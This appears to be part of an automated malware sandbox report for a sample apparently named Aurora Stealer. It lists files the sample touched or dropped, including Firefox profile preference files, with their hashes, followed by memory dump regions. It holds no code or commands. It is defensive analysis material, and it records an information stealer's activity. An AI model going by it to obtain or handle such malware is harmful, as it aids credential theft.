C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zirruo9e.default-release\prefs-1.js
Filesize
12KB

MD5
e988399bc04ca23cb094fc8185df83be

SHA1
bdf53e5eb13e7a88290a30022b23a79693cc29d1

SHA256
ce8a4ded67544b58c8af88abfd08ceeeac31438dd5310ef1cef9a73ce5c99221

SHA512
b1ea4fbbdb78edf8172487d4466fcfec217bf10a2e097a360b593158eb472b1f7915949425e6e14c7b0ffbb2808557314f3411296c8d8bff6adff8395d876ab4

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zirruo9e.default-release\prefs-1.js
Filesize
11KB

MD5
0f9b5176132ef6bf1daf524a76c6d886

SHA1
bee882a5f437736b83b8419740f798bdc251c1b6

SHA256
0044bfcb0bd05fbf42d00fa9a9e14ef4832c3d236f0f95fa7066a5b6d58e19af

SHA512
cc3653962213bfdf851dbeb70ea4ba2fba3984e9d059f7fc3fc7131fe7662a02ddc2eb9966c5722d856f16ff355e1f5daed981a5cfa3504b690c24a18df4fdc9

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zirruo9e.default-release\prefs.js
Filesize
8KB

MD5
45e75173c492b474ec441a9be75281f1

SHA1
6655fae127841da9ff77b4ecd1908ee3083419ad

SHA256
661de561e3160b6912458b8e4e53b0550e4a7e338b940fccecbb5cef517c643f

SHA512
b34994c7f36902df69b0aca46616ed029bbfe0c93effafe632e14d5d76930aa2c7edd51fbaf3f5f2ac8a28b023a4994e19781d86455bd0f8b8e2bcceb2f452e7

Download Submit
C:\Users\Admin\Desktop\AURORA STEALER\AURORA_STEALER\Aurora.exe
Filesize
25.5MB

MD5
ad9eddce12966e365ddb9b7fdae91340

SHA1
7f7bc6ceb99c67e01423c6f171df03f92771224e

SHA256
f4139d1d3f3fb68c221b9c63ad30b560420959803ab3011de83c4028213e96c6

SHA512
82932ed99e4a87730b3fda8d4bff0cae261dede6a36a25eae670b10f7d2b6903c2576b4cf8f9d263d9ec8ff22a05b967e039e0d299195bb6aad7f0445bdf2522

Download Submit
C:\Users\Admin\Downloads\p7rSxRKB.rar.part
Filesize
10.9MB

MD5
7077d053f377ac289bde8e57de60f4a5

SHA1
779664f5ff55cd1035e58f2f5568e8a41a370288

SHA256
282cd2c35141a47148dae9a17263d20edf209dca310112ebb11c47710091fdf7

SHA512
9118b53f275784ad90a3a7bfc5cd578a51fb000bff5d9beab14a4c47b3e2ba8b7c005530c3871166172f6edf090c9763d811225bedeb2327c8034d2a67511a67

Download Submit
memory/2028-1589-0x0000025CE3ED0000-0x0000025CE3ED1000-memory.dmp

Filesize
4KB

Download
memory/2028-1581-0x0000025CE3ED0000-0x0000025CE3ED1000-memory.dmp

Filesize
4KB

Download
memory/2028-1591-0x0000025CE3ED0000-0x0000025CE3ED1000-memory.dmp

Filesize
4KB

Download
memory/2028-1588-0x0000025CE3ED0000-0x0000025CE3ED1000-memory.dmp

Filesize
4KB

Download
memory/2028-1587-0x0000025CE3ED0000-0x0000025CE3ED1000-memory.dmp

Filesize
4KB

Download
memory/2028-1586-0x0000025CE3ED0000-0x0000025CE3ED1000-memory.dmp

Filesize
4KB

Download
memory/2028-1585-0x0000025CE3ED0000-0x0000025CE3ED1000-memory.dmp

Filesize
4KB

Download
memory/2028-1580-0x0000025CE3ED0000-0x0000025CE3ED1000-memory.dmp

Filesize
4KB

Download
memory/2028-1590-0x0000025CE3ED0000-0x0000025CE3ED1000-memory.dmp

Filesize
4KB

Download
memory/2028-1579-0x0000025CE3ED0000-0x0000025CE3ED1000-memory.dmp

Filesize
4KB

Download
memory/2436-1649-0x0000000000400000-0x0000000001D8A000-memory.dmp

Filesize
25.5MB

Download
memory/2448-1566-0x000001EB63F40000-0x000001EB63F62000-memory.dmp

Filesize
136KB

Download
memory/2576-1696-0x000002743A080000-0x000002743A1CE000-memory.dmp

Filesize
1.3MB

Download
memory/2940-1576-0x00007FF7C7340000-0x00007FF7C8C4B000-memory.dmp

Filesize
25.0MB

Download
memory/3480-1683-0x0000000000400000-0x0000000001D8A000-memory.dmp

Filesize
25.5MB

Download
memory/3632-1684-0x00007FF7C1370000-0x00007FF7C2C7B000-memory.dmp

Filesize
25.0MB

Download
memory/3676-1612-0x0000000000400000-0x0000000001D8A000-memory.dmp

Filesize
25.5MB

Download
memory/3692-1563-0x00000000007F0000-0x0000000000808000-memory.dmp

Filesize
96KB

Download
memory/4516-1625-0x00007FF668680000-0x00007FF669F8B000-memory.dmp

Filesize
25.0MB

Download
memory/4984-1562-0x0000000000400000-0x0000000001D8A000-memory.dmp

Filesize
25.5MB

Download
memory/5844-1661-0x00007FF68E0D0000-0x00007FF68F9DB000-memory.dmp

Filesize
25.0MB

Download